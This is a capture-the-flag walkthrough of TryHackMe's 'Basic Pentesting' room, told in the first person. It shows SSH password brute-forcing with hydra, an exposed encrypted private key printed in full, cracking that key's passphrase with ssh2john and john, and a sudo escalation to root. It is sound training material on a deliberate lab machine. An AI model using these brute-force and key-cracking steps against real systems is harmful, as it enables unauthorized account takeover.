Basic Pentesting

Platform: TryHackMe
URL: https://tryhackme.com/room/basicpentestingjt


1. Deploy the machine and connect to our network.

Ok.

2. Find the services exposed by the machine

root@ip-10-10-141-237:~# nmap 10.10.4.205

Starting Nmap 7.60 ( https://nmap.org ) at 2020-11-26 12:47 GMT
Nmap scan report for ip-10-10-4-205.eu-west-1.compute.internal (10.10.4.205)
Host is up (0.0013s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:80:3B:1E:CD:4F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds

3. What is the name of the hidden directory on the web server(enter name without /)?

root@ip-10-10-141-237:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://10.10.4.205
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.4.205
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/26 12:51:39 Starting gobuster
===============================================================
/development (Status: 301)
===============================================================
2020/11/26 12:51:51 Finished
===============================================================

✔️ The hidden directory is development.
The directory it self doesn’t contain anything valuable to use it looks like.

4. Use brute-forcing to find the username & password

Ok.

5. What is the username?

From the service scan earlier we see that samba is running. Let’s see what we can see there.

root@ip-10-10-141-237:~# smbclient -L \\\\10.10.4.205 --no-pass
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            BASIC2

We have a Anonymous share. Lets see if there is anything in it.

root@ip-10-10-141-237:~# smbclient \\\\10.10.4.205\\Anonymous --no-pass
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

		14318640 blocks of size 1024. 11079768 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (84.5 KiloBytes/sec) (average 84.5 KiloBytes/sec)

The file staff.txt file content is a message to all staff from one of the staff members, named Kay.
And he mentions another person called Jan.

root@ip-10-10-141-237:~# cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

So a wild guess is that one of these names are the username asked for.
✔️ jan was accepted as the correct answer.

6. What is the password?

So we know jan is the username, now let’s use SSH (which we saw was running the the service scan)
We use hydra to see if we can bruteforce the password. We’re using the rockyou.txt password list.

root@ip-10-10-141-237:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.4.205 -t 4 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-11-26 12:26:42
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.4.205:22/

[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344334 to do in 3735:31h, 4 active
[STATUS] 55.67 tries/min, 167 tries in 00:03h, 14344231 to do in 4294:41h, 4 active
[STATUS] 57.71 tries/min, 404 tries in 00:07h, 14343994 to do in 4142:15h, 4 active
[22][ssh] host: 10.10.4.205   login: jan   password: armando

✔️ We got a match! armando is the password.

7. What service do you use to access the server(answer in abbreviation in all caps)?

✔️ SSH of course, we just used to to bruteforce the password.

8. Enumerate the machine to find any vectors for privilege escalation

linpeas.sh is a nice script to run to get a quick overview of stuff.
One of the things linpeas found is that kay has left this private ssh key open.
We really should have been able to manually check this immediately on our first look around the system, lesson learned till next time! 😃

jan@basic2:/dev/shm$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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
-----END RSA PRIVATE KEY-----

9. What is the name of the other user you found(all lower case)?

A wild guess here too, that the other name from the staff.txt file is the username.
✔️ Which it is: kay

(We could also find this by login in as jan through ssh and look around, but I took it from the staff.txt)

10. If you have found another user, what can you do with this information?

We could see if we can gain access to kays account with the help of using his exposed private ssh key…

ssh -i kay.id_rsa kay@10.10.4.205

But wait! It looks like the private key has a password on it!
Let’s try to bruteforce it with the help of john!

First we need to get the hash of it, we do that with the help of ssh2john

root@ip-10-10-141-237:~# python /opt/john/ssh2john.py kay.id_rsa > kay.id_rsa.hash

Then let’s use john and the rockyou.txt password list to see if we can bruteforce the password!

root@ip-10-10-141-237:~# john --wordlist=/usr/share/wordlists/rockyou.txt kay.id_rsa.hash 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay.id_rsa)
1g 0:00:00:11 DONE (2020-11-27 13:38) 0.08481g/s 1216Kp/s 1216Kc/s 1216KC/s *7¡Vamos!

✔️ BOOM! Password found. beeswax!

11. What is the final password you obtain?

Now that we have the private key password, we can log in as kay!

From earlier enumeration as the user jan I remembered that there was a pass.bak file in kay’s home directory.
Let’s take a peak what it contains.

kay@basic2:~$ cat pass.bak 
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

✔️ A password! Perfect!

What else we see in kay’s home directory is that there is a file called .sudo_as_admin_successful which indicates that kay most likely can use sudo to gain root. And hopefully the password in the pass.bak file is his current password.
Let’s try! (We could also check with sudo -l)

kay@basic2:~$ sudo su
[sudo] password for kay: 
root@basic2:/home/kay# 

We’re root!

Just out of curiosity, let’s see what’s in the /root directory!

root@basic2:/home/kay# ls /root/
.bash_history  .bashrc        flag.txt       .nano/         .profile       
root@basic2:/home/kay# cat /root/flag.txt 
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!

Hang on there! More then one way to do this box? What other ways might there be?! I have to check this out in the future 😃